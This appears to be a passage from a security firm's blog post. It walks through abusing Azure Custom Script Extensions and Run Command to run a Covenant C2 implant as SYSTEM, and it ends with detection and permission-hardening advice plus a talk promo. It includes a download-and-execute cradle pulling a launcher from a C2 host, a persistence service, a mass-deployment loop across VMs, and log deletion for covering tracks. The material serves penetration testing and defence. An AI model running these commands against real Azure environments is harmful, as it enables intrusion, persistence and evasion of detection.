Once Covenant is installed and running, the UI is available on port 7443 by default. We’ll navigate to the webpage, register an initial admin user and log in. Once logged in, create an HTTP Listener. The listener will monitor a specified port, awaiting traffic from the Grunt that we’ll run on our VM. The listener lets us send commands to, and receive results from, the Grunt implant.

Covenant Http Listener

Note that “BindAddress” is 0.0.0.0, which allows Covenant to bind port 80 for all available IPv4 addresses on the local machine (where Covenant is running). The “ConnectAddress” is a DNS name for our C2 server. This value is used to generate the URL which the Grunt will communicate with.

Once a listener is created, we need to create and host our Launcher. The Launcher is a PowerShell script which we’ll run in the target VM to start the Grunt. For this demo, we’ll use Covenant’s out-of-the-box PowerShell launcher. It’s important to note that this exact script is likely to be caught by anti-virus once the VM attempts to run it, but I’ve simply disabled anti-virus for the proof-of-concept. Typically, the Launcher script would need to be altered and obfuscated to avoid detection. Once we’ve selected the PowerShell option from the Launcher Menu, we’ll first generate our script. The default options are fine for our test.

Covenant Launchers

After clicking the Generate button, we’ll navigate to the Host tab and provide a path where the script will be hosted and available from our C2 server. After we click the Host button, our script is now available for download from our server, and the UI provides a convenient PowerShell script to download and execute the Launcher.

Covenant Launchers

Our Covenant C2 server is now ready. The PowerShell Launcher script is available for download at https://c2.netspi.invalid/netspi/launcher.ps1. The Launcher will run the Grunt, which will connect back to the Covenant server to receive commands and send results.

We could actually host the PowerShell Launcher script anywhere. For example, we could host the script in GitHub or in Azure blob storage. If someone were to review the executed commands later, a script downloaded from these locations would be less suspicious. For this proof-of-concept, I prefer to use Covenant’s ability to easily host the launcher itself.

2: Use a Custom Script Extension to Launch the Implant

Thus far, all the work has been preparation. We’ve learned about the features available to us. We’ve set up our tools. Here comes the attack. We’ll use the Azure Cloud Shell, but the same steps could be performed through Azure’s Portal web interface as well. We’ll start by listing the VMs available to us using the Get-AzVM cmdlet.
PS Azure:\> Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
ResourceGroupName   Name      Location
-----------------   ----      --------
TESTER              CSETest   westcentralus
We’re able to identify a VM named “CSETest” running in the environment. We can now use the Set-AzVMCustomScriptExtension cmdlet to add a Custom Script Extension to that VM. Before issuing the shell command, let’s review the parameters we’ll pass to the cmdlet:
  1. -ResourceGroupName TESTER
     • The resource group name as identified in the previous command’s results.
  2. -VMName CSETest
     • The VM name as identified in the previous command’s results.
  3. -Location westcentralus
     • The location of the VM as identified in the previous command’s results.
  4. -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1'
     • The URL where our PowerShell Launcher is hosted by our Covenant server.
  5. -Run 'launcher.ps1'
     • The command used to execute the Launcher. In general, this is where script parameters could be passed.
  6. -Name CovenantScriptExtension
     • An arbitrary name for our Custom Script Extension.
The moment we’ve all been waiting for, let’s run our Custom Script Extension:
PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
Wait… it looks like nothing is happening in the Cloud Shell. This is because the PowerShell Launcher is still running and has not yet terminated. If we return to our Covenant UI, we’ll see a notification that a new Grunt has connected successfully, along with some basic information about the system on which it is running. In the screenshot below, note that the Hostname and OperatingSystem are correct for our targeted VM.

[Screenshot: Covenant Grunts]

With only a couple of commands, our implant is successfully running on the targeted VM. If we click on the Grunt’s name, we can interact with it and issue further commands. In the screenshot below, we confirm that the Grunt is running as the LocalSystem account.

[Screenshot: Covenant Grunts]

That’s it. We have a SYSTEM process running on the target VM under our control. We have many options from here, including establishing persistence and escalating our privileges further. For example, we could:
  • Dump hashes/credentials with Invoke-Mimikatz.
  • Install a service to ensure a Grunt is started if the VM is restarted (see the sketch after this list).
  • Search for sensitive files saved on the VM.
  • Enumerate domain information to target other VMs.
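As a rough sketch of that second option, the download cradle could be registered as an auto-start service. Everything here is hypothetical (the service name included), and note that powershell.exe is not a true service binary, so a real implant would typically use a proper service wrapper; this unobfuscated form would also likely be flagged by anti-virus:

# Hypothetical persistence sketch: re-run the Covenant download cradle at boot.
# The SCM will eventually kill powershell.exe for not answering service control
# messages, but by then the cradle will already have launched the Grunt.
New-Service -Name 'AzureHealthSvc' -StartupType Automatic -BinaryPathName 'powershell.exe -c "iex (New-Object Net.WebClient).DownloadString(''https://c2.netspi.invalid/netspi/launcher.ps1'')"'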
For now, we’ll stop this Grunt by issuing it the “Kill” command from the Covenant UI. If we return to our Cloud Shell, we’ll see that we finally have some output:
PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
RequestId IsSuccessStatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK
After we killed the Grunt, the Custom Script Extension completed successfully. This indicates that the Custom Script Extension’s execution is tied to the Grunt’s lifetime. Due to the Custom Script Extension’s 90-minute time limit, an attacker would need to accomplish their tasks within that timeframe. Alternatively, one could establish persistence and open another Grunt, then allow the Custom Script Extension to finish successfully by killing the original Grunt.
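While the Grunt keeps the extension’s execution open, the extension’s state can be polled from another Cloud Shell session with the Get-AzVMExtension cmdlet as a quick sanity check; the ProvisioningState should show a transitional value until the script returns:

PS Azure:\> Get-AzVMExtension -ResourceGroupName TESTER -VMName CSETest -Name CovenantScriptExtension | Select-Object Name, ProvisioningState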

3: Custom Script Extension Cleanup

Before moving on, let’s take a moment to cover our tracks and remove the Custom Script Extension. This can be accomplished with the Remove-AzVMCustomScriptExtension cmdlet. Its parameters are very similar to ones used for Set-AzVMCustomScriptExtension. When we run it in the Cloud Shell, we’ll see the following:
PS Azure:\> Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Name CovenantScriptExtension

Virtual machine extension removal operation
This cmdlet will remove the specified virtual machine extension. Do you want to continue?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y

RequestId IsSuccessStatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK
Helpfully, this also removes the files which were written to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension. These files are discussed in further detail at the end of this post.

4: Use the Run Command Feature to Launch Another Implant

In some cases, we may be unable to execute the Custom Script Extension. Perhaps our account doesn’t have the appropriate privileges to do so. Maybe a Custom Script Extension has already been deployed, so we can’t add another. Our alternative is to use the Run Command feature to run the same PowerShell Launcher and connect another Grunt. We’ll even get to keep the LocalSystem privileges. Since we have already identified the target VM, and Covenant has already provided a one-line command to download and run the Launcher, we only need to pass that command through the Cloud Shell to the VM via the Run Command feature. We’ll use az vm run-command for this. As we did before, let’s make sure we understand the command itself:
  1. az vm run-command invoke
     • This set of keywords forms a single logical command to "Execute a specific run command on a VM."
  2. --command-id RunPowerShellScript
     • The command we intend to execute. We could choose from pre-built commands, but we would like to execute an arbitrary PowerShell script.
  3. --name CSETest
     • The name of the VM.
  4. -g TESTER
     • The name of the resource group.
  5. --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
     • Typically, the "scripts" parameter is used to specify the name of a PowerShell script to execute. We are using it to specify the one-line command which downloads and runs the Launcher. As mentioned before, this one-line command is provided by Covenant in its UI.
Now that we know what we’re doing, let’s run our command:
PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
- Running ..
At least this time we get some immediate feedback from the Cloud Shell that something is happening. After about 30 seconds, a new Grunt appears in our Covenant UI:

[Screenshot: Covenant Grunts]

Again, we can interact with the Grunt and confirm that it is running as the LocalSystem account.

[Screenshot: Covenant Grunts]

As with the Custom Script Extension, we now have about 90 minutes before the command times out. Since we’re running as LocalSystem, we should have ample opportunity to establish persistence (if needed) and escalate privileges. If we send the "Kill" command to the new Grunt and return to our Cloud Shell, we’ll see that the command output is updated, reporting a successful execution:
{
  "value": [
    {
      "code": "ComponentStatus/StdOut/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    },
    {
      "code": "ComponentStatus/StdErr/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    }
  ]
}
Unlike the Custom Script Extension (which must be uninstalled before being deployed again), we could re-issue the same command in Cloud Shell to launch a new Grunt. If we have multiple target VMs, we could use Invoke-AzureRmVMRunCommand to execute the Launcher across many targets at once.
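As a sketch of that multi-VM approach (using Invoke-AzVMRunCommand, the current Az-module equivalent of Invoke-AzureRmVMRunCommand), assuming the Covenant one-liner has been saved locally to a hypothetical cradle.ps1:

# Launch the Grunt on every VM we can enumerate. -AsJob runs each
# (otherwise long-blocking) command as a parallel background job.
Get-AzVM | ForEach-Object {
    Invoke-AzVMRunCommand -ResourceGroupName $_.ResourceGroupName -VMName $_.Name -CommandId 'RunPowerShellScript' -ScriptPath '.\cradle.ps1' -AsJob
}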

Monitoring this attack

For blue teamers, hopefully this post illustrates how granting the Owner, Contributor, Virtual Machine Contributor, or Log Analytics Contributor role gives that user SYSTEM rights on all accessible VMs. With that access, they can embed themselves into the network, maintaining persistence and continuing to escalate. The silver lining is that these actions can be restricted by creating new roles and limiting permissions appropriately (see the sketch after this list). The related actions that one may want to restrict are:
  • Microsoft.ClassicCompute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/runCommand/action
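As a defensive sketch (assuming the Az PowerShell module), one way to restrict these actions is to clone a built-in role and add them to its NotActions; the role name below is hypothetical:

# Clone the built-in role, then exclude extension and Run Command actions.
$role = Get-AzRoleDefinition 'Virtual Machine Contributor'
$role.Id = $null
$role.IsCustom = $true
$role.Name = 'VM Contributor (No Script Execution)'   # hypothetical role name
$role.NotActions.Add('Microsoft.ClassicCompute/virtualMachines/extensions/write')
$role.NotActions.Add('Microsoft.Compute/virtualMachines/extensions/write')
$role.NotActions.Add('Microsoft.Compute/virtualMachines/runCommand/action')
$role.AssignableScopes.Clear()
$role.AssignableScopes.Add('/subscriptions/<your-subscription-id>')
New-AzRoleDefinition -Role $role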
Additionally, these actions appear in the Activity Log for the targeted VM. If these actions aren’t regularly used in the organization, it’s straightforward to create alerts for "Run Command on Virtual Machine" and "Create or Update Virtual Machine Extension."

[Screenshot: VM Activity Log]

Lastly, there are file system changes on the target VM for each of the approaches. An attacker trying to remain undetected may remove these files, but not much can be done to prevent their creation in the first place.

Custom Script Extension Files

The script itself is downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\<version>\Downloads\<other version>\<script name> when the Custom Script Extension is installed. For example, the PowerShell Launcher in our proof of concept was downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.3\Downloads\launcher.ps1. If the Custom Script Extension is later uninstalled, the whole C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension folder is removed. The output from the Custom Script Extension (including logging from the script itself) is written to the C:\WindowsAzure\Logs\Plugins\Microsoft.Compute.CustomScriptExtension\<version> folder. For example, our logs were written to the C:\WindowsAzure\Logs\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.3 folder. These logs are not automatically deleted when the Custom Script Extension is uninstalled.

Run Command Files

The Run Command approach has similar file system artifacts. The supplied script is written to C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<version>\Downloads\script<number>.ps1. Any logging output from the script is written to the C:\WindowsAzure\Logs\Plugins\Microsoft.CPlat.Core.RunCommandWindows\<version> folder.
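If an attacker with SYSTEM access wanted to remove these leftover logs, a minimal sketch (run on the VM itself) might look like the following; the Custom Script Extension download folder under C:\Packages\Plugins is already removed by uninstalling the extension, per above:

# Remove leftover extension and Run Command log folders.
Remove-Item -Recurse -Force 'C:\WindowsAzure\Logs\Plugins\Microsoft.Compute.CustomScriptExtension' -ErrorAction SilentlyContinue
Remove-Item -Recurse -Force 'C:\WindowsAzure\Logs\Plugins\Microsoft.CPlat.Core.RunCommandWindows' -ErrorAction SilentlyContinue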

Acknowledgements

Thank you to Karl Fosaaen for the previous research and the suggestion of how Custom Script Extensions could be utilized to launch implants. And thank you to cobbr at SpecterOps for publishing and maintaining Covenant, which was a pleasure to work with.
Persistence is Vital: Key Lessons Learned when Finding and Discovering CVE-2020-17049

NetSPI Managing Consultant Jake Karnes spoke at the CrestCon UK 2022 conference at the Royal College of Physicians. During this session, Jake described how he found and responsibly disclosed a serious Microsoft vulnerability: The Kerberos Bronze Bit Attack.

Watch the recording below to:

  • Gain a high-level understanding of Kerberos and the Bronze Bit Attack
  • Get a behind-the-scenes look at the responsible vulnerability disclosure process
  • Learn from and apply Jake’s lessons learned from a critical vulnerability finding to your security testing practices

[Video: https://youtu.be/aGiFRttHah4]
